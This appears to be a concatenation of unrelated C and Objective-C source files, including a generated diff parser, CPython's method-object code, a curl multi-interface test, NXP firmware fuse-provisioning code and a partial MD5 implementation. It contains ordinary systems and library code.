67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 75, 132, 78, 79, 80, 81, 94, 80, 82, 82, 83, 84, 85, 92, 84, 86, 87, 86, 87, 88, 89, 90, 91, 90, 133, 91, 133, 93, 86, 93, 87, 95, 82, 95, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 76, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 59, 121, 122, 123, 134, 126, 35, 1, 128, 130, 130, 131, 120, 135, 126, 1, 45, 126, 77, 1, 126, 90, 77, 1, 126, 1 }; static const char _DiffParser_trans_actions[] = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 0, 43, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 7, 7, 0, 43, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 28, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 31, 0, 1, 0, 0, 7, 34, 3, 0, 5, 0, 0, 7, 34, 3, 0, 5, 5, 0, 0, 0, 25, 19, 1, 0, 22, 0, 1, 7, 3, 0, 3, 7, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 40, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 37, 0, 1, 0, 1, 1, 13, 0, 1, 0, 49, 0, 0, 11, 49, 11, 0, 52, 17, 15, 61, 7, 58, 55, 46, 9 }; static const char _DiffParser_eof_actions[] = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 11, 11, 15, 55, 9, 11 }; static const int DiffParser_start = 125; static const int DiffParser_first_final = 125; static const int DiffParser_error = 0; static const int DiffParser_en_main = 125; #line 210 "DiffParser.m.rl" - (NSString*)copyMarkedString { assert( p ); assert( pmark ); int size = p - pmark; assert( size > 0 ); char* buffer = malloc( ( size + 1 ) * sizeof(char) ); assert( buffer ); memset( buffer, 0x00, size + 1 ); strncpy( buffer, pmark, size ); if( *( buffer + size ) == '\n' ) *( buffer + size ) = 0x00; // Jettison trailing '\n' NSString* content = [NSString stringWithCString:buffer encoding:NSASCIIStringEncoding]; free( buffer ); return content; } - (id)init { if ((self = [super init]) != nil) { stack = [[Stack alloc] init]; line = 1; error = nil; #line 300 "DiffParser.m.c" { cs = DiffParser_start; } #line 240 "DiffParser.m.rl" } return self; } - (void)dealloc { [stack release]; [super dealloc]; } - (void)finish { #line 319 "DiffParser.m.c" #line 253 "DiffParser.m.rl" } - (Diff *)diff:(NSString *)__content error:(NSError **)__error { p = pstart = [__content UTF8String]; const char* pe = p + [__content length]; #line 330 "DiffParser.m.c" { int _klen; unsigned int _trans; const char *_acts; unsigned int _nacts; const char *_keys; if ( p == pe ) goto _test_eof; if ( cs == 0 ) goto _out; _resume: _keys = _DiffParser_trans_keys + _DiffParser_key_offsets[cs]; _trans = _DiffParser_index_offsets[cs]; _klen = _DiffParser_single_lengths[cs]; if ( _klen > 0 ) { const char *_lower = _keys; const char *_mid; const char *_upper = _keys + _klen - 1; while (1) { if ( _upper < _lower ) break; _mid = _lower + ((_upper-_lower) >> 1); if ( (*p) < *_mid ) _upper = _mid - 1; else if ( (*p) > *_mid ) _lower = _mid + 1; else { _trans += (_mid - _keys); goto _match; } } _keys += _klen; _trans += _klen; } _klen = _DiffParser_range_lengths[cs]; if ( _klen > 0 ) { const char *_lower = _keys; const char *_mid; const char *_upper = _keys + (_klen<<1) - 2; while (1) { if ( _upper < _lower ) break; _mid = _lower + (((_upper-_lower) >> 1) & ~1); if ( (*p) < _mid[0] ) _upper = _mid - 2; else if ( (*p) > _mid[1] ) _lower = _mid + 2; else { _trans += ((_mid - _keys)>>1); goto _match; } } _trans += _klen; } _match: _trans = _DiffParser_indicies[_trans]; cs = _DiffParser_trans_targs[_trans]; if ( _DiffParser_trans_actions[_trans] == 0 ) goto _again; _acts = _DiffParser_actions + _DiffParser_trans_actions[_trans]; _nacts = (unsigned int) *_acts++; while ( _nacts-- > 0 ) { switch ( *_acts++ ) { case 0: #line 29 "DiffParser.m.rl" { line += 1; } break; case 1: #line 33 "DiffParser.m.rl" { NSString* item = [self copyMarkedString]; #if LOG_ACTIONS NSLog( @" Pushing: '%@'", item ); #endif [stack pushObject:item]; } break; case 2: #line 41 "DiffParser.m.rl" { #if LOG_ACTIONS NSLog( @" Pushing: 0" ); #endif [stack pushObject:@"0"]; } break; case 3: #line 48 "DiffParser.m.rl" { #if LOG_ACTIONS NSLog( @" Pushing: -1" ); #endif [stack pushObject:@"-1"]; } break; case 4: #line 55 "DiffParser.m.rl" { #if LOG_MARK NSLog( @"Marking @ %p '%c'", p, *p ); #endif pmark = p; } break; case 5: #line 62 "DiffParser.m.rl" { NSString* fileSpec = [self copyMarkedString]; #if LOG_ACTIONS NSLog( @" filespec: %@", fileSpec ); #endif [diff setFile:fileSpec]; } break; case 6: #line 70 "DiffParser.m.rl" { int rev = [[stack popObject] intValue]; #if LOG_ACTIONS NSLog( @" oldRev: %d", rev ); #endif [diff setOldRev:rev]; } break; case 7: #line 78 "DiffParser.m.rl" { int rev = [[stack popObject] intValue]; #if LOG_ACTIONS NSLog( @" newRev: %d", rev ); #endif [diff setNewRev:rev]; } break; case 8: #line 86 "DiffParser.m.rl" { #if LOG_ACTIONS NSLog( @" BINARY DIFF" ); #endif [diff setIsBinary:YES]; } break; case 9: #line 93 "DiffParser.m.rl" { #if LOG_ACTIONS NSLog( @" EMPTY DIFF" ); #endif } break; case 10: #line 99 "DiffParser.m.rl" { [curHunk addLine:[[DiffLine alloc] initWithString:[self copyMarkedString]]]; } break; case 11: #line 103 "DiffParser.m.rl" { #if LOG_ACTIONS NSLog( @"begin_diff" ); #endif diff = [[Diff alloc] init]; } break; case 12: #line 110 "DiffParser.m.rl" { #if LOG_ACTIONS NSLog( @"end_diff" ); #endif } break; case 13: #line 116 "DiffParser.m.rl" { #if LOG_ACTIONS NSLog( @" begin_hunk" ); #endif curHunk = [[Hunk alloc] init]; } break; case 14: #line 123 "DiffParser.m.rl" { [curHunk setNewExtent:[[stack popObject] intValue]]; [curHunk setNewFirstLine:[[stack popObject] intValue]]; [curHunk setOldExtent:[[stack popObject] intValue]]; [curHunk setOldFirstLine:[[stack popObject] intValue]]; } break; case 15: #line 130 "DiffParser.m.rl" { #if LOG_ACTIONS NSLog( @" end_hunk" ); #endif [diff addHunk:curHunk]; } break; case 16: #line 177 "DiffParser.m.rl" { p--; } break; #line 548 "DiffParser.m.c" } } _again: if ( cs == 0 ) goto _out; if ( ++p != pe ) goto _resume; _test_eof: {} if ( p == eof ) { const char *__acts = _DiffParser_actions + _DiffParser_eof_actions[cs]; unsigned int __nacts = (unsigned int) *__acts++; while ( __nacts-- > 0 ) { switch ( *__acts++ ) { case 8: #line 86 "DiffParser.m.rl" { #if LOG_ACTIONS NSLog( @" BINARY DIFF" ); #endif [diff setIsBinary:YES]; } break; case 9: #line 93 "DiffParser.m.rl" { #if LOG_ACTIONS NSLog( @" EMPTY DIFF" ); #endif } break; case 12: #line 110 "DiffParser.m.rl" { #if LOG_ACTIONS NSLog( @"end_diff" ); #endif } break; case 15: #line 130 "DiffParser.m.rl" { #if LOG_ACTIONS NSLog( @" end_hunk" ); #endif [diff addHunk:curHunk]; } break; #line 598 "DiffParser.m.c" } } } _out: {} } #line 261 "DiffParser.m.rl" [self finish]; if( cs == DiffParser_error ) { NSLog( @"Parser finished with an error." ); } if( __error != nil ) { *__error = error; } return diff; } @end
233345.c
#include <stdio.h> long long int main(void) { int t; scanf("%d", &t); while(t--) { int n; scanf("%d", &n); long long int sp[10001]; for (int i = 0; i<n; i++) { scanf("%lli", &sp[i]); } int cnt = 1; for (int i = 0; i < (n-1); i++) { if(sp[i+1] < sp[i]) cnt++; else sp[i+1] = sp[i]; } printf("%d\n", cnt); } return 0; }
987705.c
/* Method object implementation */ #include "Python.h" #include "structmember.h" /* Free list for method objects to safe malloc/free overhead * The m_self element is used to chain the objects. */ static PyCFunctionObject *free_list = NULL; static int numfree = 0; #ifndef PyCFunction_MAXFREELIST #define PyCFunction_MAXFREELIST 256 #endif PyObject * PyCFunction_NewEx(PyMethodDef *ml, PyObject *self, PyObject *module) { PyCFunctionObject *op; op = free_list; if (op != NULL) { free_list = (PyCFunctionObject *)(op->m_self); PyObject_INIT(op, &PyCFunction_Type); numfree--; } else { op = PyObject_GC_New(PyCFunctionObject, &PyCFunction_Type); if (op == NULL) return NULL; } op->m_ml = ml; Py_XINCREF(self); op->m_self = self; Py_XINCREF(module); op->m_module = module; _PyObject_GC_TRACK(op); return (PyObject *)op; } PyCFunction PyCFunction_GetFunction(PyObject *op) { if (!PyCFunction_Check(op)) { PyErr_BadInternalCall(); return NULL; } return ((PyCFunctionObject *)op) -> m_ml -> ml_meth; } PyObject * PyCFunction_GetSelf(PyObject *op) { if (!PyCFunction_Check(op)) { PyErr_BadInternalCall(); return NULL; } return ((PyCFunctionObject *)op) -> m_self; } int PyCFunction_GetFlags(PyObject *op) { if (!PyCFunction_Check(op)) { PyErr_BadInternalCall(); return -1; } return ((PyCFunctionObject *)op) -> m_ml -> ml_flags; } PyObject * PyCFunction_Call(PyObject *func, PyObject *arg, PyObject *kw) { PyCFunctionObject* f = (PyCFunctionObject*)func; PyCFunction meth = PyCFunction_GET_FUNCTION(func); PyObject *self = PyCFunction_GET_SELF(func); Py_ssize_t size; switch (PyCFunction_GET_FLAGS(func) & ~(METH_CLASS | METH_STATIC | METH_COEXIST)) { case METH_VARARGS: if (kw == NULL || PyDict_Size(kw) == 0) return (*meth)(self, arg); break; case METH_VARARGS | METH_KEYWORDS: return (*(PyCFunctionWithKeywords)meth)(self, arg, kw); case METH_NOARGS: if (kw == NULL || PyDict_Size(kw) == 0) { size = PyTuple_GET_SIZE(arg); if (size == 0) return (*meth)(self, NULL); PyErr_Format(PyExc_TypeError, "%.200s() takes no arguments (%zd given)", f->m_ml->ml_name, size); return NULL; } break; case METH_O: if (kw == NULL || PyDict_Size(kw) == 0) { size = PyTuple_GET_SIZE(arg); if (size == 1) return (*meth)(self, PyTuple_GET_ITEM(arg, 0)); PyErr_Format(PyExc_TypeError, "%.200s() takes exactly one argument (%zd given)", f->m_ml->ml_name, size); return NULL; } break; default: PyErr_SetString(PyExc_SystemError, "Bad call flags in " "PyCFunction_Call. METH_OLDARGS is no " "longer supported!"); return NULL; } PyErr_Format(PyExc_TypeError, "%.200s() takes no keyword arguments", f->m_ml->ml_name); return NULL; } /* Methods (the standard built-in methods, that is) */ static void meth_dealloc(PyCFunctionObject *m) { _PyObject_GC_UNTRACK(m); Py_XDECREF(m->m_self); Py_XDECREF(m->m_module); if (numfree < PyCFunction_MAXFREELIST) { m->m_self = (PyObject *)free_list; free_list = m; numfree++; } else { PyObject_GC_Del(m); } } static PyObject * meth_get__doc__(PyCFunctionObject *m, void *closure) { const char *doc = m->m_ml->ml_doc; if (doc != NULL) return PyUnicode_FromString(doc); Py_INCREF(Py_None); return Py_None; } static PyObject * meth_get__name__(PyCFunctionObject *m, void *closure) { return PyUnicode_FromString(m->m_ml->ml_name); } static int meth_traverse(PyCFunctionObject *m, visitproc visit, void *arg) { Py_VISIT(m->m_self); Py_VISIT(m->m_module); return 0; } static PyObject * meth_get__self__(PyCFunctionObject *m, void *closure) { PyObject *self; self = m->m_self; if (self == NULL) self = Py_None; Py_INCREF(self); return self; } static PyGetSetDef meth_getsets [] = { {"__doc__", (getter)meth_get__doc__, NULL, NULL}, {"__name__", (getter)meth_get__name__, NULL, NULL}, {"__self__", (getter)meth_get__self__, NULL, NULL}, {0} }; #define OFF(x) offsetof(PyCFunctionObject, x) static PyMemberDef meth_members[] = { {"__module__", T_OBJECT, OFF(m_module), PY_WRITE_RESTRICTED}, {NULL} }; static PyObject * meth_repr(PyCFunctionObject *m) { if (m->m_self == NULL || PyModule_Check(m->m_self)) return PyUnicode_FromFormat("<built-in function %s>", m->m_ml->ml_name); return PyUnicode_FromFormat("<built-in method %s of %s object at %p>", m->m_ml->ml_name, m->m_self->ob_type->tp_name, m->m_self); } static PyObject * meth_richcompare(PyObject *self, PyObject *other, int op) { PyCFunctionObject *a, *b; PyObject *res; int eq; if ((op != Py_EQ && op != Py_NE) || !PyCFunction_Check(self) || !PyCFunction_Check(other)) { Py_INCREF(Py_NotImplemented); return Py_NotImplemented; } a = (PyCFunctionObject *)self; b = (PyCFunctionObject *)other; eq = a->m_self == b->m_self; if (eq) eq = a->m_ml->ml_meth == b->m_ml->ml_meth; if (op == Py_EQ) res = eq ? Py_True : Py_False; else res = eq ? Py_False : Py_True; Py_INCREF(res); return res; } static long meth_hash(PyCFunctionObject *a) { long x,y; if (a->m_self == NULL) x = 0; else { x = PyObject_Hash(a->m_self); if (x == -1) return -1; } y = _Py_HashPointer((void*)(a->m_ml->ml_meth)); if (y == -1) return -1; x ^= y; if (x == -1) x = -2; return x; } PyTypeObject PyCFunction_Type = { PyVarObject_HEAD_INIT(&PyType_Type, 0) "builtin_function_or_method", sizeof(PyCFunctionObject), 0, (destructor)meth_dealloc, /* tp_dealloc */ 0, /* tp_print */ 0, /* tp_getattr */ 0, /* tp_setattr */ 0, /* tp_reserved */ (reprfunc)meth_repr, /* tp_repr */ 0, /* tp_as_number */ 0, /* tp_as_sequence */ 0, /* tp_as_mapping */ (hashfunc)meth_hash, /* tp_hash */ PyCFunction_Call, /* tp_call */ 0, /* tp_str */ PyObject_GenericGetAttr, /* tp_getattro */ 0, /* tp_setattro */ 0, /* tp_as_buffer */ Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC,/* tp_flags */ 0, /* tp_doc */ (traverseproc)meth_traverse, /* tp_traverse */ 0, /* tp_clear */ meth_richcompare, /* tp_richcompare */ 0, /* tp_weaklistoffset */ 0, /* tp_iter */ 0, /* tp_iternext */ 0, /* tp_methods */ meth_members, /* tp_members */ meth_getsets, /* tp_getset */ 0, /* tp_base */ 0, /* tp_dict */ }; /* Clear out the free list */ int PyCFunction_ClearFreeList(void) { int freelist_size = numfree; while (free_list) { PyCFunctionObject *v = free_list; free_list = (PyCFunctionObject *)(v->m_self); PyObject_GC_Del(v); numfree--; } assert(numfree == 0); return freelist_size; } void PyCFunction_Fini(void) { (void)PyCFunction_ClearFreeList(); } /* PyCFunction_New() is now just a macro that calls PyCFunction_NewEx(), but it's part of the API so we need to keep a function around that existing C extensions can call. */ #undef PyCFunction_New PyAPI_FUNC(PyObject *) PyCFunction_New(PyMethodDef *, PyObject *); PyObject * PyCFunction_New(PyMethodDef *ml, PyObject *self) { return PyCFunction_NewEx(ml, self, NULL); }
675669.c
/* Copyright (c) 2019, Ameer Haj Ali (UC Berkeley), and Intel Corporation All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include "header.h" int input[128] ALIGNED16; int output[128] ALIGNED16; __attribute__((noinline)) void example4c (){ int i; const int MAX = 4; /* feature: support for if-conversion */ for (i=0; i<128-1; i+=2){ int j = input[i]; output[i] = (j > MAX ? MAX : 0); output[i+1] = j; } } int main(int argc,char* argv[]){ init_memory(&input[0], &input[128]); init_memory(&output[0], &output[128]); BENCH("Example4c", example4c(), Mi*4/128*512, digest_memory(&output[0], &output[128])); return 0; }
533458.c
/***************************************************************************** * _ _ ____ _ * Project ___| | | | _ \| | * / __| | | | |_) | | * | (__| |_| | _ <| |___ * \___|\___/|_| \_\_____| * */ #include "test.h" #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include "testutil.h" #include "memdebug.h" #define MAIN_LOOP_HANG_TIMEOUT 90 * 1000 #define MULTI_PERFORM_HANG_TIMEOUT 60 * 1000 static CURLMcode perform(CURLM * multi) { int handles, maxfd; CURLMcode code; fd_set fdread, fdwrite, fdexcep; struct timeval mp_start; char mp_timedout = FALSE; mp_timedout = FALSE; mp_start = tutil_tvnow(); for (;;) { code = curl_multi_perform(multi, &handles); if (tutil_tvdiff(tutil_tvnow(), mp_start) > MULTI_PERFORM_HANG_TIMEOUT) { mp_timedout = TRUE; break; } if (handles <= 0) return CURLM_OK; switch (code) { case CURLM_OK: break; case CURLM_CALL_MULTI_PERFORM: continue; default: return code; } FD_ZERO(&fdread); FD_ZERO(&fdwrite); FD_ZERO(&fdexcep); curl_multi_fdset(multi, &fdread, &fdwrite, &fdexcep, &maxfd); if (maxfd < 0) return (CURLMcode) ~CURLM_OK; if (select(maxfd + 1, &fdread, &fdwrite, &fdexcep, 0) == -1) return (CURLMcode) ~CURLM_OK; } /* We only reach this point if (mp_timedout) */ if (mp_timedout) fprintf(stderr, "mp_timedout\n"); fprintf(stderr, "ABORTING TEST, since it seems " "that it would have run forever.\n"); return (CURLMcode) ~CURLM_OK; } int test(char *URL) { CURLM *multi; CURL *easy; int res = 0; if (curl_global_init(CURL_GLOBAL_ALL) != CURLE_OK) { fprintf(stderr, "curl_global_init() failed\n"); return TEST_ERR_MAJOR_BAD; } if ((multi = curl_multi_init()) == NULL) { fprintf(stderr, "curl_multi_init() failed\n"); curl_global_cleanup(); return TEST_ERR_MAJOR_BAD; } if ((easy = curl_easy_init()) == NULL) { fprintf(stderr, "curl_easy_init() failed\n"); curl_multi_cleanup(multi); curl_global_cleanup(); return TEST_ERR_MAJOR_BAD; } curl_multi_setopt(multi, CURLMOPT_PIPELINING, 1L); test_setopt(easy, CURLOPT_WRITEFUNCTION, fwrite); test_setopt(easy, CURLOPT_FAILONERROR, 1L); test_setopt(easy, CURLOPT_URL, URL); if (curl_multi_add_handle(multi, easy) != CURLM_OK) { printf("curl_multi_add_handle() failed\n"); res = TEST_ERR_MAJOR_BAD; } else { if (perform(multi) != CURLM_OK) printf("retrieve 1 failed\n"); curl_multi_remove_handle(multi, easy); } curl_easy_reset(easy); test_setopt(easy, CURLOPT_FAILONERROR, 1L); test_setopt(easy, CURLOPT_URL, libtest_arg2); if (curl_multi_add_handle(multi, easy) != CURLM_OK) { printf("curl_multi_add_handle() 2 failed\n"); res = TEST_ERR_MAJOR_BAD; } else { if (perform(multi) != CURLM_OK) printf("retrieve 2 failed\n"); curl_multi_remove_handle(multi, easy); } test_cleanup: curl_easy_cleanup(easy); curl_multi_cleanup(multi); curl_global_cleanup(); printf("Finished!\n"); return res; }
809862.c
/* * Copyright 2021 NXP * * SPDX-License-Identifier: BSD-3-Clause * */ #include <assert.h> #include <string.h> #include <common/debug.h> #include <dcfg.h> #include <drivers/delay_timer.h> #include <fuse_prov.h> #include <io_block.h> #include <io_driver.h> #include <io_fip.h> #include <io_memmap.h> #include <io_storage.h> #include <lib/utils.h> #include <nxp_gpio.h> #include <sfp.h> #include <sfp_error_codes.h> #include <tools_share/firmware_image_package.h> #include "fuse_io.h" #include <load_img.h> #include <plat/common/platform.h> #include "plat_common.h" #include "platform_def.h" extern uintptr_t backend_dev_handle; static uint32_t fuse_fip; static uintptr_t fuse_fip_dev_handle; static io_block_spec_t fuse_fip_block_spec = { .offset = PLAT_FUSE_FIP_OFFSET, .length = PLAT_FUSE_FIP_MAX_SIZE }; static const io_uuid_spec_t fuse_prov_uuid_spec = { .uuid = UUID_FUSE_PROV, }; static const io_uuid_spec_t fuse_up_uuid_spec = { .uuid = UUID_FUSE_UP, }; static int open_fuse_fip(const uintptr_t spec); struct plat_io_policy { uintptr_t *dev_handle; uintptr_t image_spec; int (*check)(const uintptr_t spec); }; /* By default, ARM platforms load images from the FIP */ static const struct plat_io_policy fuse_policies[] = { [FUSE_FIP_IMAGE_ID - FUSE_FIP_IMAGE_ID] = { &backend_dev_handle, (uintptr_t)&fuse_fip_block_spec, NULL }, [FUSE_PROV_IMAGE_ID - FUSE_FIP_IMAGE_ID] = { &fuse_fip_dev_handle, (uintptr_t)&fuse_prov_uuid_spec, open_fuse_fip }, [FUSE_UP_IMAGE_ID - FUSE_FIP_IMAGE_ID] = { &fuse_fip_dev_handle, (uintptr_t)&fuse_up_uuid_spec, open_fuse_fip } }; static int open_fuse_fip(const uintptr_t spec) { int result; uintptr_t local_image_handle; /* See if a Firmware Image Package is available */ result = io_dev_init(fuse_fip_dev_handle, (uintptr_t)FUSE_FIP_IMAGE_ID); if (result == 0) { result = io_open(fuse_fip_dev_handle, spec, &local_image_handle); if (result == 0) { VERBOSE("Using FIP\n"); io_close(local_image_handle); } } return result; } /* The image can be one of the DDR PHY images, which can be sleected via DDR * policies */ int plat_get_fuse_image_source(unsigned int image_id, uintptr_t *dev_handle, uintptr_t *image_spec, int (*check)(const uintptr_t spec)) { int result; const struct plat_io_policy *policy; assert(image_id < (FUSE_FIP_IMAGE_ID + ARRAY_SIZE(fuse_policies))); policy = &fuse_policies[image_id - FUSE_FIP_IMAGE_ID]; if (image_id == FUSE_FIP_IMAGE_ID) { result = check(policy->image_spec); } else { result = policy->check(policy->image_spec); } if (result == 0) { *image_spec = policy->image_spec; *dev_handle = *(policy->dev_handle); } return result; } int fuse_fip_setup(const io_dev_connector_t *fip_dev_con, unsigned int boot_dev) { int io_result; size_t fuse_fip_offset = PLAT_FUSE_FIP_OFFSET; /* Open connections to fuse fip and cache the handles */ io_result = io_dev_open(fip_dev_con, (uintptr_t)&fuse_fip, &fuse_fip_dev_handle); assert(io_result == 0); switch (boot_dev) { #if QSPI_BOOT case BOOT_DEVICE_QSPI: fuse_fip_offset += NXP_QSPI_FLASH_ADDR; break; #endif #if NOR_BOOT case BOOT_DEVICE_IFC_NOR: fuse_fip_offset += NXP_NOR_FLASH_ADDR; break; #endif #if FLEXSPI_NOR_BOOT case BOOT_DEVICE_FLEXSPI_NOR: fuse_fip_offset += NXP_FLEXSPI_FLASH_ADDR; break; #endif default: break; } fuse_fip_block_spec.offset = fuse_fip_offset; return io_result; } int fip_fuse_provisioning(uintptr_t image_buf, uint32_t size) { uint32_t bit_num; uint32_t *gpio_base_addr = NULL; struct fuse_hdr_t *fuse_hdr = NULL; uint8_t barker[] = {0x68U, 0x39U, 0x27U, 0x81U}; int ret = -1; if (sfp_check_oem_wp() == 0) { ret = load_img(FUSE_PROV_IMAGE_ID, &image_buf, &size); if (ret != 0) { ERROR("Failed to load FUSE PRIV image\n"); assert(ret == 0); } fuse_hdr = (struct fuse_hdr_t *)image_buf; /* Check barker code */ if (memcmp(fuse_hdr->barker, barker, sizeof(barker)) != 0) { ERROR("FUSE Barker code mismatch.\n"); error_handler(ERROR_FUSE_BARKER); return 1; } /* Check if GPIO pin to be set for POVDD */ if (((fuse_hdr->flags >> FLAG_POVDD_SHIFT) & 0x1) != 0) { gpio_base_addr = select_gpio_n_bitnum(fuse_hdr->povdd_gpio, &bit_num); /* * Add delay so that Efuse gets the power * when GPIO is enabled. */ ret = set_gpio_bit(gpio_base_addr, bit_num); mdelay(EFUSE_POWERUP_DELAY_mSec); } else { ret = (board_enable_povdd() == true) ? 0 : PLAT_ERROR_ENABLE_POVDD; } if (ret != 0) { ERROR("Error enabling board POVDD: %d\n", ret); ERROR("Only SFP mirror register will be set.\n"); } provision_fuses(image_buf, ret == 0); /* Check if GPIO pin to be reset for POVDD */ if (((fuse_hdr->flags >> FLAG_POVDD_SHIFT) & 0x1) != 0) { if (gpio_base_addr == NULL) { gpio_base_addr = select_gpio_n_bitnum( fuse_hdr->povdd_gpio, &bit_num); } ret = clr_gpio_bit(gpio_base_addr, bit_num); } else { ret = board_disable_povdd() ? 0 : PLAT_ERROR_DISABLE_POVDD; } if (ret != 0) { ERROR("Error disabling board POVDD: %d\n", ret); } } return 0; }
44428.c
// This is an implementation of MD5 based on: https://github.com/WaterJuice/WjCryptLib/blob/master/lib/WjCryptLib_Md5.c // which has been modified extensively // // The original source, as specified there, is "This is free and unencumbered software released into the public domain - June 2013 waterjuice.org". // All modifications are (c) 2020 Divon Lan and are subject to license. #include <memory.h> #include "genozip.h" #include "md5.h" #include "endianness.h" #include "profiler.h" #include "vblock.h" #define F( x, y, z ) ( (z) ^ ((x) & ((y) ^ (z))) ) #define G( x, y, z ) ( (y) ^ ((z) & ((x) ^ (y))) ) #define H( x, y, z ) ( (x) ^ (y) ^ (z) ) #define I( x, y, z ) ( (y) ^ ((x) | ~(z)) ) #define STEP( f, a, b, c, d, x, t, s ) \ (a) += f((b), (c), (d)) + (x) + (t); \ (a) = (((a) << (s)) | (((a) & 0xffffffff) >> (32 - (s)))); \ (a) += (b); void md5_display_ctx (const Md5Context *x) // for debugging { static unsigned iteration=1; fprintf (stderr, "\n%2u: %08x %08x %08x %08x %08x %08x ", iteration, x->hi, x->lo, x->a, x->b, x->c, x->d); for (unsigned i=0; i<64; i++) fprintf (stderr, "%2.2x", x->buffer.bytes[i]); fprintf (stderr, "\n"); iteration++; } static const void *md5_transform (Md5Context *ctx, const void *data, uintmax_t size) { const uint32_t *ptr = (uint32_t *)data; uint32_t a = ctx->a; uint32_t b = ctx->b; uint32_t c = ctx->c; uint32_t d = ctx->d; do { uint32_t saved_a = a; uint32_t saved_b = b; uint32_t saved_c = c; uint32_t saved_d = d; #ifdef __LITTLE_ENDIAN__ // in little endian machines, we can access the data directly - we don't need to copy memory #define block ptr #else // in big endian machines - we need to flip the data to little endian - so we do it in a copy uint32_t block[16]; for (unsigned i=0; i < 16; i++) block[i] = LTEN32(ptr[i]); #endif // Round 1 STEP( F, a, b, c, d, block[0], 0xd76aa478, 7 ) STEP( F, d, a, b, c, block[1], 0xe8c7b756, 12 ) STEP( F, c, d, a, b, block[2], 0x242070db, 17 ) STEP( F, b, c, d, a, block[3], 0xc1bdceee, 22 ) STEP( F, a, b, c, d, block[4], 0xf57c0faf, 7 ) STEP( F, d, a, b, c, block[5], 0x4787c62a, 12 ) STEP( F, c, d, a, b, block[6], 0xa8304613, 17 ) STEP( F, b, c, d, a, block[7], 0xfd469501, 22 ) STEP( F, a, b, c, d, block[8], 0x698098d8, 7 ) STEP( F, d, a, b, c, block[9], 0x8b44f7af, 12 ) STEP( F, c, d, a, b, block[10], 0xffff5bb1, 17 ) STEP( F, b, c, d, a, block[11], 0x895cd7be, 22 ) STEP( F, a, b, c, d, block[12], 0x6b901122, 7 ) STEP( F, d, a, b, c, block[13], 0xfd987193, 12 ) STEP( F, c, d, a, b, block[14], 0xa679438e, 17 ) STEP( F, b, c, d, a, block[15], 0x49b40821, 22 ) // Round 2 STEP( G, a, b, c, d, block[1], 0xf61e2562, 5 ) STEP( G, d, a, b, c, block[6], 0xc040b340, 9 ) STEP( G, c, d, a, b, block[11], 0x265e5a51, 14 ) STEP( G, b, c, d, a, block[0], 0xe9b6c7aa, 20 ) STEP( G, a, b, c, d, block[5], 0xd62f105d, 5 ) STEP( G, d, a, b, c, block[10], 0x02441453, 9 ) STEP( G, c, d, a, b, block[15], 0xd8a1e681, 14 ) STEP( G, b, c, d, a, block[4], 0xe7d3fbc8, 20 ) STEP( G, a, b, c, d, block[9], 0x21e1cde6, 5 ) STEP( G, d, a, b, c, block[14], 0xc33707d6, 9 ) STEP( G, c, d, a, b, block[3], 0xf4d50d87, 14 ) STEP( G, b, c, d, a, block[8], 0x455a14ed, 20 ) STEP( G, a, b, c, d, block[13], 0xa9e3e905, 5 ) STEP( G, d, a, b, c, block[2], 0xfcefa3f8, 9 ) STEP( G, c, d, a, b, block[7], 0x676f02d9, 14 ) STEP( G, b, c, d, a, block[12], 0x8d2a4c8a, 20 ) // Round 3 STEP( H, a, b, c, d, block[5], 0xfffa3942, 4 ) STEP( H, d, a, b, c, block[8], 0x8771f681, 11 ) STEP( H, c, d, a, b, block[11], 0x6d9d6122, 16 ) STEP( H, b, c, d, a, block[14], 0xfde5380c, 23 ) STEP( H, a, b, c, d, block[1], 0xa4beea44, 4 ) 